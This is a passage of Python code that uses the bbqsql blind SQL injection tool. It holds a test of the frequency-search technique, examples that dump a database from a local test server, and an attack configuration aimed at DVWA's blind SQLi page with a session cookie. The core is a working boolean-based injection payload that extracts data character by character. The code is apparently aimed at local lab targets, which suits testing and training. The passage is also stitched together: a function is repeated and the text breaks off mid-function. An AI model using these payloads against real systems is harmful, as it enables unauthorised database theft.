def test_frequency_technique(self):
url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
query = bbqsql.Query(
"row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",
encoder=quote)
b = bbqsql.BlindSQLi(url=url.q_string,
query=query.q_string,
method='GET',
comparison_attr='size',
technique='frequency_search',
concurrency=1)
results = b.run()
self.assertEqual(results, test_data)
def fetch_(field, interact=False):
sql = ('(%s limit 1 offset ${row_index:1})'
if 'from' in field else '(%s)') % field
query = bbqsql.Query(
"' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #"
% sql)
b = bbqsql.BlindSQLi(url=url,
query=query,
method='GET',
comparison_attr='status_code',
**attack_config)
if interact:
if not b.error:
try:
ok = raw_input('Everything lookin groovy?[y,n] ')
except KeyboardInterrupt:
ok = False
if ok and ok[0] != 'n':
return b.run()
print(b.error)
else:
return b.run()
'''
#STATUS CODE BASED EXAMPLE
url = bbqsql.Query('http://127.0.0.1:8090/error?${injection}')
query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)
bh = bbqsql.BlindSQLi(url=url,query=query,method='GET',comparison_attr='status_code',technique='frequency_search',concurrency=35)
start = time()
results = bh.run()
stop = time()
print "dumped db in %f seconds" % (stop-start)
'''
#SIZE BASED EXAMPLE
url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)
bh = bbqsql.BlindSQLi(url=url,query=query,method='GET',comparison_attr='size',technique='frequency_search',concurrency=3)
start = time()
results = bh.run()
stop = time()
print "dumped db in %f seconds" % (stop-start)
#TEXT BASED EXAMPLE
'''
url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)
bbqsql.settings.PRETTY_PRINT_FREQUENCY = 1.
bbqsql.settings.QUIET = False
attack_config = {}
attack_config['cookies'] = {
'PHPSESSID': sessid,
'security': 'low',
}
attack_config['technique'] = 'binary_search'
attack_config['technique'] = 'frequency_search'
attack_config['concurrency'] = 5
attack_config['menu_mode'] = False # prevent printing '\n'*100
# dvwa
url = bbqsql.Query(
'http://localhost:9191/vulnerabilities/sqli_blind/?id=${dejection}&Submit=Submit',
encoder=quote)
def fetch_(field, interact=False):
sql = ('(%s limit 1 offset ${row_index:1})'
if 'from' in field else '(%s)') % field
query = bbqsql.Query(
"' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #"
% sql)
b = bbqsql.BlindSQLi(url=url,
query=query,
method='GET',
comparison_attr='status_code',
**attack_config)
if interact: